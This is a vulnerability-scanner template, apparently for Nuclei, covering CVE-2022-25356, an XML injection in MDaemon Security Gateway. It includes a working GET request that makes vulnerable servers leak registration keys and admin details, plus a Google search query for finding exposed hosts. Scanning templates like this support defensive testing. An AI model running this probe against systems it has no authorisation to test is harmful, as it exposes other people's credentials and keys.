id: CVE-2022-25356 info: name: Alt-n/MDaemon Security Gateway <=8.5.0 - XML Injection author: Akincibor severity: medium description: | Alt-n/MDaemon Security Gateway through 8.5.0 is susceptible to XML injection via SecurityGateway.dll?view=login. An attacker can inject an arbitrary XML argument by adding a new parameter in the HTTP request URL. As a result, the XML parser fails the validation process and discloses information such as protection used (2FA), admin email, and product registration keys. remediation: | Upgrade Alt-n/MDaemon Security Gateway to version 8.5.1 or later to mitigate this vulnerability. reference: - https://www.swascan.com/security-advisory-alt-n-security-gateway/ - https://www.altn.com/Products/SecurityGateway-Email-Firewall/ - https://www.swascan.com/security-blog/ - https://nvd.nist.gov/vuln/detail/CVE-2022-25356 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2022-25356 cwe-id: CWE-91 epss-score: 0.00425 epss-percentile: 0.7146 cpe: cpe:2.3:a:altn:securitygateway:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: altn product: securitygateway google-query: inurl:"/SecurityGateway.dll" tags: cve,cve2022,altn,gateway,xml,injection http: - method: GET path: - '{{BaseURL}}/SecurityGateway.dll?view=login&redirect=true&9OW4L7RSDY=1' matchers-condition: and matchers: - type: word part: body words: - "Exception: Error while [Loading XML" - "<RegKey>" - "<IsAdmin>" condition: and - type: status status: - 200 # digest: 4a0a004730450221009e2615f8bd2e95766f68bc7155a7ca00aa441689c10f988fac1104755498268002200708f6bf416ecd8a1c4d308f497784246fde06115428d7db072fcc8e2ebcda5f:922c64590222798bb761d5b6d8e72950